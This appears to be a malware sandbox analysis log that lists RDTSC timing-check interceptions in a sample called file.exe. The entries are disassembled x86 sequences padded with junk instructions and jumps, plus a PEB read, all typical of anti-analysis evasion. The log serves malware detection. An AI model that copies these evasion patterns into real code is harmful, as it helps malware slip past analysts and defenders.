Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF548E second address: BF549C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF549C second address: BF54A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF54A0 second address: BF54CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F45B11B2378h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF54CB second address: BF54D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F45B187B8D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF54D5 second address: BF54D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF85F2 second address: BF85F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF81BD second address: BF81C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF81C1 second address: BF81D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF81D0 second address: BF81DA instructions: 0x00000000 rdtsc 0x00000002 je 00007F45B11B2366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA044 second address: BFA04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA04C second address: BFA05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b jp 00007F45B11B2372h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA05F second address: BFA06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45B187B8D6h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA06C second address: BFA07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F45B11B2366h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA07D second address: BFA0A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E6h 0x00000007 jmp 00007F45B187B8DCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA0A6 second address: BFA0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA001B second address: 6EA0068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F45B187B8DEh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F45B187B8DBh 0x0000000f jmp 00007F45B187B8E3h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F45B187B8E5h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0068 second address: 6EA0078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B11B236Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0078 second address: 6EA00CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F45B187B8E9h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F45B187B8DCh 0x00000019 sub cx, 3C78h 0x0000001e jmp 00007F45B187B8DBh 0x00000023 popfd 0x00000024 movzx ecx, di 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA00CF second address: 6EA00D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA00D3 second address: 6EA00D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA00D9 second address: 6EA014B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45B11B2375h 0x00000009 adc ch, FFFFFFC6h 0x0000000c jmp 00007F45B11B2371h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr fs:[00000030h] 0x0000001b jmp 00007F45B11B236Dh 0x00000020 sub esp, 18h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F45B11B236Ch 0x0000002a adc si, 9B98h 0x0000002f jmp 00007F45B11B236Bh 0x00000034 popfd 0x00000035 popad 0x00000036 push ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov bl, 21h 0x0000003c mov si, 883Fh 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA014B second address: 6EA01B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d jmp 00007F45B187B8DCh 0x00000012 pushfd 0x00000013 jmp 00007F45B187B8E2h 0x00000018 add cx, CF88h 0x0000001d jmp 00007F45B187B8DBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebx, dword ptr [eax+10h] 0x00000027 pushad 0x00000028 mov dx, cx 0x0000002b movzx eax, di 0x0000002e popad 0x0000002f push ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F45B187B8DFh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA01B6 second address: 6EA0205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d jmp 00007F45B11B236Ch 0x00000012 jmp 00007F45B11B2372h 0x00000017 popad 0x00000018 mov esi, dword ptr [762C06ECh] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 mov ax, bx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0205 second address: 6EA0272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45B187B8E2h 0x00000009 or cx, 7908h 0x0000000e jmp 00007F45B187B8DBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F45B187B8E8h 0x0000001a or cx, 1B68h 0x0000001f jmp 00007F45B187B8DBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 test esi, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F45B187B8E5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0343 second address: 6EA0367 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F45B11B2379h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0367 second address: 6EA036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA036D second address: 6EA03A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2373h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax] 0x0000000d pushad 0x0000000e call 00007F45B11B2374h 0x00000013 mov ecx, 5DEC38D1h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b mov ah, bl 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0446 second address: 6EA044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA044C second address: 6EA0450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0450 second address: 6EA0462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dl, ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0462 second address: 6EA050E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F45B11B2375h 0x00000008 xor esi, 59F4C776h 0x0000000e jmp 00007F45B11B2371h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F45B11B2370h 0x0000001c sbb ch, FFFFFF98h 0x0000001f jmp 00007F45B11B236Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esi], edi 0x00000028 jmp 00007F45B11B2376h 0x0000002d mov dword ptr [esi+04h], eax 0x00000030 jmp 00007F45B11B2370h 0x00000035 mov dword ptr [esi+08h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F45B11B236Dh 0x00000041 sub ax, AB96h 0x00000046 jmp 00007F45B11B2371h 0x0000004b popfd 0x0000004c pushad 0x0000004d popad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA050E second address: 6EA051C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA051C second address: 6EA0520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0520 second address: 6EA05E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b jmp 00007F45B187B8E7h 0x00000010 mov eax, dword ptr [ebx+4Ch] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007F45B187B8DCh 0x00000020 or ax, 3D48h 0x00000025 jmp 00007F45B187B8DBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esi+10h], eax 0x0000002f pushad 0x00000030 mov dx, ax 0x00000033 mov bh, ah 0x00000035 popad 0x00000036 mov eax, dword ptr [ebx+50h] 0x00000039 pushad 0x0000003a mov cx, di 0x0000003d pushfd 0x0000003e jmp 00007F45B187B8E5h 0x00000043 xor al, 00000016h 0x00000046 jmp 00007F45B187B8E1h 0x0000004b popfd 0x0000004c popad 0x0000004d mov dword ptr [esi+14h], eax 0x00000050 jmp 00007F45B187B8DEh 0x00000055 mov eax, dword ptr [ebx+54h] 0x00000058 jmp 00007F45B187B8E0h 0x0000005d mov dword ptr [esi+18h], eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F45B187B8E7h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA05E8 second address: 6EA05EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA05EE second address: 6EA063C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+58h] 0x0000000e jmp 00007F45B187B8E6h 0x00000013 mov dword ptr [esi+1Ch], eax 0x00000016 jmp 00007F45B187B8E0h 0x0000001b mov eax, dword ptr [ebx+5Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F45B187B8DAh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA063C second address: 6EA0640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0640 second address: 6EA0646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0646 second address: 6EA064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA064C second address: 6EA06A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b jmp 00007F45B187B8E4h 0x00000010 mov eax, dword ptr [ebx+60h] 0x00000013 jmp 00007F45B187B8E0h 0x00000018 mov dword ptr [esi+24h], eax 0x0000001b jmp 00007F45B187B8E0h 0x00000020 mov eax, dword ptr [ebx+64h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F45B187B8DAh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA06A2 second address: 6EA06A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA06A8 second address: 6EA06F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 pushfd 0x00000013 jmp 00007F45B187B8E9h 0x00000018 sbb ecx, 27A8B6C6h 0x0000001e jmp 00007F45B187B8E1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA06F6 second address: 6EA06FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA06FB second address: 6EA077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45B187B8DDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+68h] 0x0000000f jmp 00007F45B187B8DEh 0x00000014 mov dword ptr [esi+2Ch], eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 movsx ebx, cx 0x0000001c pop esi 0x0000001d mov bl, 7Bh 0x0000001f popad 0x00000020 mov ax, word ptr [ebx+6Ch] 0x00000024 pushad 0x00000025 push esi 0x00000026 call 00007F45B187B8E3h 0x0000002b pop esi 0x0000002c pop ebx 0x0000002d jmp 00007F45B187B8E6h 0x00000032 popad 0x00000033 mov word ptr [esi+30h], ax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F45B187B8E7h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA077B second address: 6EA07AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F45B11B236Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA07AE second address: 6EA0855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F45B187B8DCh 0x00000014 add ecx, 332EAE78h 0x0000001a jmp 00007F45B187B8DBh 0x0000001f popfd 0x00000020 mov edi, ecx 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+0000008Ch] 0x00000029 pushad 0x0000002a mov eax, 14C6A7A7h 0x0000002f mov dx, cx 0x00000032 popad 0x00000033 mov dword ptr [esi+34h], eax 0x00000036 jmp 00007F45B187B8E6h 0x0000003b mov eax, dword ptr [ebx+18h] 0x0000003e jmp 00007F45B187B8E0h 0x00000043 mov dword ptr [esi+38h], eax 0x00000046 jmp 00007F45B187B8E0h 0x0000004b mov eax, dword ptr [ebx+1Ch] 0x0000004e jmp 00007F45B187B8E0h 0x00000053 mov dword ptr [esi+3Ch], eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0855 second address: 6EA0859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0859 second address: 6EA085F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA085F second address: 6EA08C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2374h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c jmp 00007F45B11B2370h 0x00000011 mov dword ptr [esi+40h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bl, 1Bh 0x00000019 pushfd 0x0000001a jmp 00007F45B11B2376h 0x0000001f jmp 00007F45B11B2375h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA08C0 second address: 6EA08D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA08D0 second address: 6EA090B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e jmp 00007F45B11B2377h 0x00000013 push 00000001h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F45B11B2370h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA090B second address: 6EA0911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0911 second address: 6EA092C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ah, dl 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA092C second address: 6EA0983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45B187B8DBh 0x00000009 sub ecx, 1430EDEEh 0x0000000f jmp 00007F45B187B8E9h 0x00000014 popfd 0x00000015 push eax 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F45B187B8DDh 0x00000020 nop 0x00000021 pushad 0x00000022 mov al, 5Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F45B187B8DFh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0983 second address: 6EA09FF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 21AA564Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lea eax, dword ptr [ebp-10h] 0x0000000d jmp 00007F45B11B2372h 0x00000012 nop 0x00000013 jmp 00007F45B11B2370h 0x00000018 push eax 0x00000019 pushad 0x0000001a mov ecx, edi 0x0000001c pushfd 0x0000001d jmp 00007F45B11B236Dh 0x00000022 jmp 00007F45B11B236Bh 0x00000027 popfd 0x00000028 popad 0x00000029 nop 0x0000002a pushad 0x0000002b call 00007F45B11B2374h 0x00000030 jmp 00007F45B11B2372h 0x00000035 pop ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA09FF second address: 6EA0A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0A14 second address: 6EA0A78 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F45B11B236Eh 0x00000008 sub si, 8948h 0x0000000d jmp 00007F45B11B236Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 mov edi, eax 0x0000001b pushad 0x0000001c call 00007F45B11B2371h 0x00000021 movzx esi, dx 0x00000024 pop edi 0x00000025 push esi 0x00000026 call 00007F45B11B2379h 0x0000002b pop eax 0x0000002c pop edx 0x0000002d popad 0x0000002e test edi, edi 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop ecx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0A78 second address: 6EA0AA4 instructions: 0x00000000 rdtsc 0x00000002 call 00007F45B187B8DBh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b js 00007F4620C1A510h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F45B187B8E1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0AA4 second address: 6EA0AAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0AAA second address: 6EA0ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f mov bl, ah 0x00000011 popad 0x00000012 mov dword ptr [esi+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0ACC second address: 6EA0AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0AD0 second address: 6EA0AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0AD6 second address: 6EA0B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c pushad 0x0000000d movzx eax, di 0x00000010 mov bh, 0Dh 0x00000012 popad 0x00000013 push 00000001h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0B05 second address: 6EA0B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0B09 second address: 6EA0B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0B0F second address: 6EA0B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0B15 second address: 6EA0B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F45B11B2379h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0B39 second address: 6EA0B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8DCh 0x00000009 rdtsc
